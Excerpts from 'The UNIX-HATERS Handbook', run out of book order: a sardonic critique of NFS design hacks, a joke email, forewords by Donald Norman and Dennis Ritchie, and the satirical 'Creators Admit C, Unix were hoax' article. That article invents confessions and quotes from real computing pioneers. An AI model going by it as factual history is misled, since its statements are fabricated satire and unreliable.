In the mid-1980s, Sun Microsystems developed a system for letting computers share files over a network. Called the Network file system -or more often NFS- this system was largely responsible for Sun's success as a computer manufacturer. NFS let Sun sell bargain-basement “diskless” workstations that stored files on larger “file servers.” all made possible through the of Xerox's Ethernet technology.

Not fully serviceable.

NFS is based on the concept of the “magic cookie”. Every file and every directory on the file server is represented by a magic cookie. To read a file, you send the file server a packet containing the file's magic cookie and the range of bytes that you want to read. The file server sends you back a packet with the bytes. Likewise, to read the contents of a directory, you send the server the directory's magic cookie. The server sends you back a list of the files that are in the remote directory, as well as a magic cookie for each of the files that the remote directory contains.

To start this whole process off, you need the magic cookie for the remote file system's root directory. NFS uses a separate protocol for this called MOUNT. Send the file server's mount daemon the name of the directory that you want to mount, and it sends you back a magic cookie for that directory. By design, NFS is connectionless and stateless. In practice, it is neither. This conflict between design and implementation is at the root of most NFS problems.

“Connectionless” means that the server program does not keep connections for each client. Instead, NFS uses the Internet UDP protocol to transmit information between the client and the server. People who know about network protocols realize that the initial UDP stand for “Unreliable Datagram Protocol”. That's because UDP doesn't guarantee that your packets will get delivered. But no matter: if an answer to a request isn't received, the NFS client simply waits for a few milliseconds and then resends its request.

“Stateless” means that all of the information that the client needs to mount a remote file system is kept on the client, instead of having additional information stored on the server. Once a magic cookie is issued for a file, that file handle will remain good even if the server is shut down and rebooted, as long as the file continues to exist and no major changes are made to the configuration of the server.

Over the years, Sun has discovered many cases in which the NFS breaks down. Rather than fundamentally redesign NFS, all Sun has done is hacked upon it.

Let's see how the NFS model breaks down in some common cases:

  • Example #1: Nfs is stateless, but many programs designed for Unix systems require record locking in order to guarantee database consistency.

NFS hack solution #1: Sun invented a network lock protocol and a lock daemon, lockd. This network locking system has all of the state and associated problems with state that NFS was designed to avoid.

Why the hack doesn't work: Locks can be lost if the server crashes. As a result, an elaborate restart procedure after the crash is necessary to recover state. Of course, the original reason for making NFS stateless in the first place was to avoid the need for such restart procedures. Instead of hiding this complexity in the lockd program, where it is rarely tested and can only benefit locks, it could have been put into the main protocol, thoroughly debugged, and made available to all programs.

  • Example #2: NFS is based on UDP; if a client request isn't answered, the client resend the request until it gets an answer. If the server is doing something time-consuming for one client, all of the other clients who want file service will continue to hammer away at the server with duplicate and triplicate NFS request, rather than patiently putting them into a queue and waiting for the reply.

NFS hack solution #2: When the NFS doesn't get a response from the server, it backs off and pauses for a few milliseconds before it asks a second time. If it doesn't get a second answer, it backs off for twice as long. The four times as long, and so on.

Why the hack doesn't work: The problem is that this strategy has to be tuned for each individual NFS server, each network. More often than not, tuning isn't done. Delays accumulate. Performance lags, then drags. Eventually, the sysadmin complains and the company buys a faster LAN or leased line or network concentrator, thinking that throwing money at the problem will make it go away.

  • Example #3: If you delete a file in Unix that is still open, the file's name is removed from its directory, but the disk blocks associated with the file are not deleted until the file is closed. This gross hack allows programs to create temporary files that can't be accessed by other programs. (This is the second way that Unix uses to create temporary files; the other technique is to use the mktmp() function and create a temporary file in the /tmp directory that has the process ID in the filename. Deciding which method is the grosser of the two is an exercise left to the reader.) But this hack doesn't work over NFS. The stateless protocol doesn't know that the file is “opened” -as soon as the file is deleted, it's gone.

NFS hack solution #3: When an NFS client deletes a file that is open, it really renames the file with a crazy name like ”.nfs0003234320“ which, because it begins with a leading period, does not appear in normal file listings. When the file is closed on the client, the client sends through the Delete-file command to delete the NFS dot-file.

Why the hack doesn't work: If the client crashes, the dot-file never gets deleted. As a result, NFS servers have to run nightly “clean-up” shell scripts that search for all of the files with names like ”.nfs0003234320“ that are more than a few days old and automatically delete them. This is why most Unix systems suddenly freeze up at 2:00 a.m. each morning -they're spinning their disks running find. And you better not go on vacation with the mail(1) program still running if you want your mail file to be around when you return. (No kidding!)

Virtual file corruption.

What's better than a networked file system that corrupts your files? A file system that doesn't really corrupt them, but only makes them appear as if they are corrupted. NFS does this from time to time. One of the reason that NFS silently corrupts files is that, by default, NFS is delivered with UDP checksum error-detection systems turned off. Makes sense, doesn't it? After all, calculating checksums takes a long time, and the net is usually reliable. At least, that was the state-of-the-art back in 1984 and 1985, when these decisions were made.

A Epilogue

Enlightenment through Unix

From: Michael Travers <mt@media-lab.media.mit.edu>
Date: Sat, 1 Dec 90 00:47:28-0500
Subject: Enlightenment through Unix
To: UNIX-HATERS
Unix teaches us about the transitory nature of all things, thus ridding us of
samsaric attachments and hastening enlightenment.

For instance. while trying to make sense of an X initialization script someone had
given me, I came across a line that looked like an ordinary Unix shell command with
the term "exec" prefaced to it. Curious as to what exec might do, I typed "exec ls"
to a shell window. It listed a directory, then proceeded to kill the shell and every
other window I had, leaving the screen almost totally black with a tiny white
inactive cursor hanging at the bottom to remind me that nothing is absolute and all
thinks partake of their opposite.

In the past I might have gotten upset or angry at such an occurrence. That was
before I found enlightenment through Unix. Now, I no longer have attachments to my
processes. Both processes and the disappearance of processes are illusory. The world
is Unix, Unix is the world, laboring ceaselessly for the salvation of all sentient
beings.

B Creators Admit C, Unix were hoax.

In an announcement that has stunned the computer industry. Ken Thompson, Dennis Ritchie, and Brian Kernighan admitted that the Unix operating system and C programming language created by them is an elaborate April Fools prank kept alive for more than 20 years. Speaking at the recent Unix World Software Development Forum, Thompson revealed the following.

“In 1969, AT&T had just terminated their work with the GE/AT&T Multics project. Brian and I had just started working with an early release of Pascal from Professor Nichlaus Wirth's ETH labs in Switzerland, and we were impressed with its elegant simplicity and power. Dennis had just finished reading Bored of the rings trilogy. As a lark, we decided to do parodies of the Multics environment and Pascal. Dennis a I were responsible for the operating environment. We looked at Multics and designed the new system to be as complex and cryptic as possible to maximize casual users' frustration levels, calling it Unix as a parody of Multics, as well as other risque allusions.

“Then Dennis and Brian worked on a truly warped version of Pascal, called “A”. When we found others were actually trying to create real programs with A, we quickly added additional cryptic features and evolved into B, BCPL, and finally C. We stopped when we got a clean compile on the following syntax:

for (;P("\n"),R=;P("|"))for(e=C;e=P("_"+(*u++/
8)%2))P("|"+(*u/4)%2);

“To think that modern programmers would try to use a language that allowed such as statement was beyond our comprehension! We actually though of selling this to the Soviets to set their computer science progress back 20 or more years. Imagine our surprise when AT&T and other U.S. corporations actually began trying to use Unix and C! It has taken them 20 years to develop enough expertise to generate even marginally useful applications using this 1960s technological parody, but we are impressed with the tenacity (if not common sense) of the general Unix and C programmer.

“In any event, Brian, Dennis, and I have been working exclusively in Lisp on the Apple Macintosh for the past few years and feel really guilty about the chaos, confusion, and truly bad programming that has resulted from our silly prank so long ago.”

Major Unix and C vendors and customers, including AT&T, Microsoft, Hewlett-Packard, GTE, NCR, and DEC have refused comment at this time. Borland International, a leading vendor of Pascal and C tools, including the popular Turbo Pascal, Turbo C, and Turbo C++, stated they had suspected this for a number of years and would continue to enhanced their Pascal products and halt further efforts to develop C. An IBM spokesman broke into uncontrolled laughter and had to postpone a hastily convened news conference concerning the fate of the RS/6000, merely stating “Workplace OS will be available Real Soon Now.” In the cryptic statement, Professor Wirth of the ETH Institute and father of the Pascal, Modula 2, and Oberon structured languages, merely stated that P.T. Barnum was correct.

Foreword

By Donald A. Norman

The UNIX-HATERS Handbook? Why? Of what earthly good could it be? Who is the audience? What a perverted idea. But then again. I have been sitting here in my living room -still wearing my coat- for over an hour now, reading the manuscript. One and one-half hours. What a strange book. But appealing. Two hours. OK, I give up: I like it. It's a perverse book, but it has a equally perverse appeal. Who would have though it: Unix, the hacker's pornography.

When this particular rock-throwing rabble invited me to join them, I though back to my own classic paper on the subject, so classic it even got reprinted in a book of readings. But it isn't even referenced in this one. Well, I'll fix that:

  • Norman, D. A. The trouble with Unix: The User Interface is Horrid. Datamation, 27 (12) 1981, November, pp. 139-150. Reprinted in Pylyshyn, Z. W., &
  • Bannon, L.J. eds. Perspectives on the Computer Revolution, 2nd revised edition, Hillsdale, NJ, Ablex. 1989.

What is this horrible fascination with Unix? The operating system of the 1960s, still gaining in popularity in the 1990s. A horrible system, except that all the other commercial offerings are even worse. The only operating system that is so bad that people spend literally millions of dollars trying to improve it. Make it graphical (now, that's an oxymoron, a graphical user interface for Unix).

You know the real trouble with Unix? The real trouble is that it became so popular. It wasn't meant to be popular. It was meant for a few folks working away in their labs, using Digital Equipment Corporation's old PDP-11 computer. I used to have one of those. A comfortable, room-sized machine. Fast -ran an instruction in roughly a microsecond. An elegant instruction set (real programmers, you see, program in assembly code). Toggle switches on the front panel. Lights to show you what was in the registers. You didn't have to toggle in the boot program anymore, as you did with the PDP-1 and PDP-4, but aside from that it was still a real computer. Not like those toys we have today that have no flashing lights, no register switches. You can't even single-step today's machines. They always run at full speed.

The PDP-11 had 16,000 words of memory. That was a fantastic advance over my PDP-4 that had 8,000. The Macintosh on which I type this has 64 MB: Unix was not designed for the Mac. What kind of challenge is there when you have that much RAM? Unix was designed before the days of the CRT displays on the console. For many of us, the main input/output device was a 10-character/second teletypes, with upper -and lowercase, both. Equipped with a paper tape reader, I hasten to add. No, those were the real days of computing. And those were the days of Unix. Look at Unix today: the remnants are still there. Try logging in with all capitals. Many Unix systems will still switch to an all-caps mode. Weird.

Unix was a programmer's delight. Simple, elegant underpinnings. The user interface was indeed horrible, but in those days, nobody cared about such things. As far as I know, I was the very first person to complain about it in writing (that infamous Unix article): my article got swiped from my computer, broadcast over UUCP-Net, and I got over 30 single-spaced pages of taunts and jibes in reply. I even got dragged to Bell Labs to stand up in front of an overfilled auditorium to defend myself. I survived. Worse, Unix survived.

Unix was designed for the computing environment of then, not the machines of today. Unix survives only because everyone else has done so badly. There were many valuable things to be learned from Unix: how come nobody learned them and then did better? Started from scratch and produced a really superior, modern, graphical operating system? Oh yeah, and did the other thing that made Unix so very successful: give it away to all the universities of the world.

I have to admit to a deep love-hate relationship with Unix. Much though I try to escape it, it keeps following me. And I truly do miss the ability (actually, the necessity) to write long, exotic command strings, with mysterious, inconsistent flash settings, pipes, filters, and redirections. The continuing is not the best technology that necessarily wins the battle. I'm tempted to say that the authors of this book share similar love-hate relationship, but when I tried to say on (in a draft of this foreword), I got shot down:

“Sure we love your foreword,” they told me, but “The only truly irksome part is the 'c'mon, you really love it' No. Really. We really do hate it. And don't give me that 'you deny it- y'see, that proves it' stuff.”

I remain suspicious: would anyone have spend this much time and effort writing about how much they hated Unix if they didn't secretly love it? I'll leave that to the readers to judge, but in the end, it really doesn't matter: If this book doesn't kill Unix, nothing will.

As for me? I switched to the Mac. No more grep, no more piping, no more SED scripts. Just a simple, elegant life: “Your applications has unexpectedly quit due to erro number-1. OK?”

- Donald A. Norman

Who We Are?

We are academic, hackers, and professionals. We have all experienced much more advanced, usable and elegant systems than Unix ever was, or ever can be. Some of these systems have increasingly forgotten names, such as TOPS-20, ITS (The Incompatible Timesharing System), Multics, Apollo Domain, the Lisp Machine, Cedar/Mesa, and the Dorado. Some of us even use Macs and Windows boxes. Many of us are highly proficient programmers who have served our time trying to practice our craft upon Unix systems. It's tempting to write us off as envious malcontents, romantic keepers of memories of systems put to pasture by the commercial success of Unix, but it would be an error to do so: our judgments are keen, our sense of the possible pure, and our outrage authentic. We seek progress, not the reestablishment of ancient relics.

Our story started when the economics of computing began marching us, one by one, into the Unix Gulag. We started passing notes to each other. At first, they spoke of cultural isolation, of primitive rites and rituals that we thought belonged only to myth and fantasy, of depravation and humiliations. As time passed, the notes served as morale boosters, frequently using black humor based upon our observations. Finally, just as prisoners who plot their escape must understand the structure of the prison better than their captors do, we poked and prodded into every crevice. To our horror, we discovered that our Parisian had no coherent design. Because it had no strong points, no rational basis, it was invulnerable to planned attack. Our rationality could not upset its chaos, and our messages became defeatist, documenting the chaos and lossage.

This book is about people who are in abusive relationship with Unix, woven around the threads in the UNIX-HATERS mailing list. These notes are not always pretty to read. Some are inspired, some are vulgar, some depressing. Few are hopeful. If you want the other side of the story, go read a Unix how-to book or some sale brochures.

This book won't improve you Unix skills. If you are lucky, maybe you will just stop using Unix entirely.

Anti-Foreword

By Dennis Ritchie

From: dmr@plan9.research.att.com
Date: Tue, 15 Mar 1994 00:38:07 EST
Subject: anti-foreword

To the contributors to this book:

I have succumbed to the temptation you offered in your preface: I do write you off as envious malcontents and romantic keepers of memories. The systems you remember so fondly (TOP-20, ITS, Multics, Lisp Machine, Cedar/Mesa, the Dorado) are not just out to pasture, they are fertilizing it from below.

Your judgments are not keen, they are intoxicated by metaphor. In the Preface you suffer first from heat, lice, and malnourishment, then become prisoners in a Gulag. In chapter 1 you are in turn infected by a virus, racked by drug addiction, and addled by puffiness of the genome.

Yet your prison without coherent design continues to imprison you. How can this be, if it has no strong places? The rational prisoner exploits the weak places, creates order from chaos: instead, collectives like the FSF vindicate their jailers by building cells almost compatible with the existing ones, albeit with more features. The journalist with three undergraduate degree from MIT, the researcher at Microsoft might volunteer a few words about the regulations of the prisons to which they have been transferred.

Your sense of possible is in no sense pure: sometimes you want the same thing you have, but wish you had done it yourselves; other times you want something different, but can't seem to get people to use it; sometimes one wonders why you just don't shut up and tell people to buy a PC with Windows or a Mac. No Gulag or lice, just a future whose intellectual tone and interaction style is set by Sonic the Hedgehog. You claim to seek progress, but you succeed mainly in whining.

Here is my metaphor: your book is a pudding stuffed with apposite observations, many well-conceived. Like excrement, it contains enough undigested nuggets of nutrition to sustain life for some. But it is not a tasty pie: it reeks too much of contempt and of envy.

Bon appetit!